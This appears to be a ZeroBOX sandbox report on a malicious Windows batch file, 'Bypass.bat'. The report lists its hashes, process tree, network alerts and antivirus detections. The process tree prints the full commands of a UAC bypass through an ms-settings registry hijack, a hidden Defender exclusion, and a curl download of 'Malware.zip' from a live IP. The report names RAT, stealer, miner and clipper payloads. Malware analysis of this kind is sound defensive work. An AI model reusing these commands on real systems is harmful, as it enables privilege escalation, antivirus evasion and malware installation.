Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 23, 2023, 9:34 a.m.	Sept. 23, 2023, 9:37 a.m.

Size	1019.0B
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`08c880b1f0b63680b7bdd78408bdceda`
SHA256	`90eb14090777aa5ec4e72b3850a25fc4d08e64273c85586494b9838df8d493d9`
CRC32	`9E4F7AB9`
ssdeep	`24:OlWrpSFURAuUOZzalHkS76AcZzTW/nZzTWYZzTWHnZzTI8nZzTZ8nZzT08nZzTuW:ODQAza2lBDEfW/ZfWIfW5fImfZmf0mfJ`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iYxNOhPj" C:\Users\test22\AppData\Local\Temp\Bypass.bat
2540
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Bypass.bat
  2620
  - reg.exe reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /v "" /d "C:\Users\test22\AppData\Local\Temp\X.exe -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\ServiceHub'}" /f
    2712
  - reg.exe reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
    2756
  - timeout.exe timeout "3"
    2824
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo yes "
    2888
  - reg.exe reg delete "HKCU\Software\Classes\.thm\Shell\Open\command" /f
    2924
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo yes "
    2976
  - reg.exe reg delete "HKCU\Software\Classes\ms-settings\CurVer" /f
    3012
  - timeout.exe timeout "60"
    3068
  - curl.exe curl "45.66.230.113/Malware.zip" -O "C:\Users\test22\AppData\Local\ServiceHub\Malware.zip"
    2744

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
45.66.230.113	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 45.66.230.113:80 -> 192.168.56.101:49177	2402000	ET DROP Dshield Block Listed Source group 1	Misc Attack
TCP 192.168.56.101:49177 -> 45.66.230.113:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 45.66.230.113:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49177 -> 45.66.230.113:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (18 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: 'fodhelper.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:34 a.m.	buffer: 'tar' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:34 a.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:35 a.m.	buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Rat.exe. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:35 a.m.	buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Stealer.exe. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:35 a.m.	buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Miner.exe. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:35 a.m.	buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Clipper.exe. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:35 a.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 23, 2023, 9:35 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: Waiting for 3 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: Waiting for 60 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 23, 2023, 9:33 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 23, 2023, 9:34 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://45.66.230.113/Malware.zip

Performs some HTTP requests (1 event)

request

GET http://45.66.230.113/Malware.zip

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /S /D /c" echo yes "

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\X.exe

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	C:\Users\test22\AppData\Local\ServiceHub\Rat.exe
cmdline	reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
cmdline	reg delete "HKCU\Software\Classes\.thm\Shell\Open\command" /f
cmdline	reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /v "" /d "C:\Users\test22\AppData\Local\Temp\X.exe -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\ServiceHub'}" /f
cmdline	reg delete "HKCU\Software\Classes\ms-settings\CurVer" /f

Communicates with host for which no DNS query was performed (1 event)

host

45.66.230.113

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

ESET-NOD32	BAT/TrojanDownloader.Agent.PDG
Kaspersky	HEUR:Trojan.BAT.Agent.gen
BitDefender	Trojan.GenericKD.69403469
MicroWorld-eScan	Trojan.GenericKD.69403469
Emsisoft	Trojan.GenericKD.69403469 (B)
VIPRE	Trojan.GenericKD.69403469
McAfee-GW-Edition	BehavesLike.Backdoor.xq
FireEye	Trojan.GenericKD.69403469
GData	Trojan.GenericKD.69403469
MAX	malware (ai score=83)
Arcabit	Trojan.Generic.D423034D
ZoneAlarm	HEUR:Trojan.BAT.Agent.gen

Bypass.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All